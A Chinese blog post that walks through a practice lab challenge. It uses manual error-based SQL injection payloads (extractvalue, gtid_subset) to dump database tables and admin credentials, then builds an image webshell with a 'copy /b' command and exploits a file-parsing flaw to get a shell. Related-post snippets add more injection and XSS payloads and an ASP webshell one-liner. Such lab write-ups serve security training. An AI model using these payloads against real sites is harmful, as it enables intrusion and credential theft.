封神台(尤里的复仇),信息收集1--靶场练习,纯手工注入

已于 2023-10-10 16:39:59 修改
阅读量748 收藏 2
点赞数 1
文章标签: 数据库 学习 安全 web安全
于 2023-10-10 16:31:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60584088/article/details/133715499
版权

信息收集1–靶场练习

靶场地址:靶场

开启靶场:

  • 打开就一个网页,平平无奇。
  • 点点功能点,没发现什么可以利用的
  • 尝试扫描一波目录,直接御剑扫描就行,这里使用的是kali的dirsearch,发现了/admin,访问:
    .在这里插入图片描述
  • 先尝试弱口令登录
  • admin admin
  • 在这里插入图片描述
  • 那么尝试sql注入,先加个’ 尝试一下
    在这里插入图片描述
  • 这里回显出sql语句,那么存在sql注入漏洞
  • 尝试报错注入:admin' or extractvalue(1,concat(0x7e,database())) #
    在这里插入图片描述
  • 这里爆出了数据库:caidian
  • 那么说明报错注入有效
  • 接着报错注入:admin' or extractvalue(1,concat(0x7e,@@basedir)) #
  • 在这里插入图片描述
  • 继续:admin' or gtid_subset(concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="caidian")),1) #
    在这里插入图片描述
  • 这里发现了manage 表,一般账号密码都保存在一些敏感目录,直接查看其中的列:admin' or gtid_subset(concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="manage")),1) #

在这里插入图片描述

  • 果然如此,发现了user,name,password等,那么继续:admin' or gtid_subset(concat(0x7e,(select group_concat(concat(user,name,password)) from caidian.manage)),1) #
  • 在这里插入图片描述
  • 这里发现了其中的user,password等内容,但是其中密码一般会采用md5加密,那么将后面的密码密文找到md5解密网站解密得到其中的zkaqsea账户的密码为:seazkaq

在这里插入图片描述

登录后台,尝试获取权限

采用sql注入出来的用户名密码登录后台
在这里插入图片描述
也是成功登录,直接点击可用功能点,逐个测试,没有找到相关的信息,那么就想办法getshell了
在这里插入图片描述

这里发现上传点,并且好像只能上传图片格式,那么只能写一个图片马,上传!

copy 11.jpg /b +3.asp /a 22.jpg #将图片文件(qq.png)和一句话木马文件(guo.asp)合称为同一个文件(test.jpg)
在这里插入图片描述
上传后,发现这里的中间件版本
在这里插入图片描述
这里存在文件解析漏洞,那么可以通过这个漏洞,完成getshell
那么这里访问刚才上传成功的jpg文件,后面加上/.php
在这里插入图片描述
看到访问页面为乱码,这就说明解析漏洞利用成功了,那么直接菜刀连接:
密码是刚才图片马中的值
在这里插入图片描述

  • 小tips:
  • 这里的flag在fannu–>files–>config.php文件中
    在这里插入图片描述

参考链接

`

久恙502
关注
神台尤里复仇Ⅱ 回归)渗透第一步 信息收集1
Bu2n的博客
01-02 4983
前言解题过程 前言 做这道题的时候,我的心情真是跌宕起伏。。为什么这么说,且听我娓娓道来。 解题过程 打开传送门,被传送到这个网站 随便点了几个模块,感觉都没有可利用的漏洞,直接扫描目录去了 扫到了admin目录,这个应该是后台登录网址,打开一看果然是 一开始密码暴力破解,没有破解到,开始有点烦躁。 (暴力破解.jpg)这里就不放burp破解的图了,有兴趣可以自己去试 然后想是否存在sql注入绕过密码登录的方法,试了试 无果 那报错注入呢? 输入 ' or gtid_subset(concat.
神台尤里复仇Ⅱ 回归)绕过防护getshell
Bu2n的博客
01-05 3555
解题思路 习惯在url后加admin,看是不是管理后台。 一看发现是,就不用目录扫描工具了 填入正确的验证码,抓包输入',查看有无报错 发现报错了,存在报错注入,看报错描述可以知道是字符型注入 查看当前数据库 payload ' or extractvalue(1,concat(0x7e,database()))%23 查看当前库的所有表 payload ' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from info
神台靶场-尤里复仇-第一章
weixin_58373549的博客
01-29 317
神台靶场-尤里复仇-第一章:为了女神小芳!【配套课时:SQL注入攻击原理 实战演练】
尤里复仇II 回归【7题】
feiniaotjx的博客
10-23 2974
尤里复仇II 回归【7题】渗透第一步-信息收集 1渗透第一步-信息收集 2基础环境搭建sqlmap尝鲜题 渗透第一步-信息收集 1 扫目录,但是要从files目录扫,(看了wp才知到) http://oovw8022.ia.aqlab.cn:8022/caidian/files/ 渗透第一步-信息收集 2 这个cms在网上搜了,没有找到,应该是迷惑我们的 看使用说明得知是海熊cms 查询到了cms,就可以在网上找payload了(也可以自己测试),手动无果,再用sqlmap 得到数据库 得表 得字段
渗透测试练习靶场汇总
最新发布
qq_53058639的博客
08-27 986
Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。
渗透测试入门1之信息收集
鹿鸣天涯
04-04 997
渗透测试入门1之信息收集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 子域名获取 字典列表 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 1.开源情报信息收集(OSINT) 1.1 github Github_Nuggests(自动爬取Githu...
神台靶场
m0_71518346的博客
10-18 754
尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替。用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截。username和password字段的值:admin、b9a2a2b5dffb918c。直接尝试注入判断字段数order by 10。默认管理员后台是根目录的/admin/发现页面回显了2、3、7、8、9。
神台 尤里复仇II 回归 信息收集1&&2
shierbai的博客
05-13 335
正常去做信息收集时,看到config文件都是见猎心喜的,这里虽然没直接写flag,但也该多尝试,事实证明,这个尝试是正确的。这里说有sql注入,那么就要找注入点,之前把熊海cms这个指纹识别了,直接去搜索一波。其实在页面源码处也能看到一些可能存在sql注入的点,(这里也是到处点了一波,例如什么。一个可疑的files,一堆php和txt里脱颖而出,对files进行目录扫描。这里被遮住感觉是提示,但说了是基础目录扫描,御剑启动!找到这个,但感觉是后面可能用的,说明是熊海cms。
神台ctf练习靶场——一月靶场
AlunXZhou的博客
03-18 1803
神台刷题
神台靶场练习
token_x的博客
08-05 404
神台靶场练习,未完待补充
神台----尤里复仇I-第五章:进击!拿到Web最高权限!
正在学习的路上...
07-18 1969
1.使用cookie进入后台 根据提示信息 需要用到上个关卡的cookie,去XSS平台拿到cookie,删去flag=zkz{****}, 点击之前,打开Burp,进行抓包,替换cookie 放行,进入后台页面。 2.找上传点 在产品管理-添加产品中可以上传图片。 上传带asp一句话的图片, asp一句话:<%eval request (“hacker”)%> 木马一般会被拦截...
神台----尤里复仇I-第三章:这个后台能识别登录者…
正在学习的路上...
07-18 1953
根据提示,真正的后台地址为admin123,输入上一关的账号、密码进去。 分析代码: 从请求头中拿到Referer,并赋值给ComeUrl。 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeUrl有 " : ",表明有端口号,在为cUrl 加上端口号。 最后判断cUrl和...
神台----尤里复仇I-第六章:SYSTEM!POWER!
正在学习的路上...
07-19 1555
通过上一章,上传的shell,使用菜刀连接 右键点击 输入命令 whoami 权限不足,这里需要用到提权工具,工具在 就不用再上传了。 右键点击cmd.exe,打开虚拟终端,输入whoami,可以看到当前用户。 尝试创建用户命令: net user 110 110 /add 还是权限不足。 这是因为cmd需要用到外部接口wscript.shell。 但是wscript.shell仍然...
神台靶场 | 布尔盲注 | Pass05-07
Fanny0602的博客
03-12 1608
神台靶场 | 布尔盲注 题目地址: 掌控安全学院SQL注入靶场 文章目录       Pass05          盲注          盲注查询步骤       Pass06       Pass07 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass05 数据库查询语句: select * from news where id=1 盲注: 1.查询到的数据只会显示有数据/没有结果 2.可以用ASCII进行猜测 盲注查询步骤: 1.数据库名字长度 2.数据库库名 3.
渗透测试第一步(信息收集
whoim_i的博客
04-04 4703
目录前言信息收集方式区别域名信息收集主域名信息子域名信息网络信息搜索旁站、c段信息收集绕过cdn获取真实ip网站架构分析服务器类型网站容器脚本类型数据库类型CMS类型WAF主机及端口扫描网站敏感目录和文件         ~~~~~~~~      &nbs...
神台DOM XSS靶场
qq_40941912的博客
10-05 1028
作业 DOM XSS靶场 (Rank: 10) 在页面上可填写的地方都输入 Native编码: \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0032\u0033\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e 插入到url中,发现弹窗了: 此处的payload被当作代码执行了 把xss平台
神台靶场---尤里复仇Ⅰ小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 2674
神台----尤里复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习靶场练习
神台靶场 | 显错注入 | Pass01-04
Fanny0602的博客
03-05 970
神台靶场 | 显错注入 题目地址: 掌控安全学院SQL注入靶场 显错注入 Pass01 Pass02 Pass03 Pass04 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass01 数据库查询语句: select *from user where id=1 Pass02 数据库查询语句: select *from user where id=‘1’ Pass03 数据库查询语句: select *from user where id=(‘1’) Pass04 数据库查询语
mbp 神台靶场 一(笔记)
热门推荐
qq_43558415的博客
02-09 1万+
最近在看掌控安全的公开课,里面提到了神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。 一、寻找注入点 看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。 二、判断字段数 在发现这可以进行SQL注入后便要判断它的字段数,用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值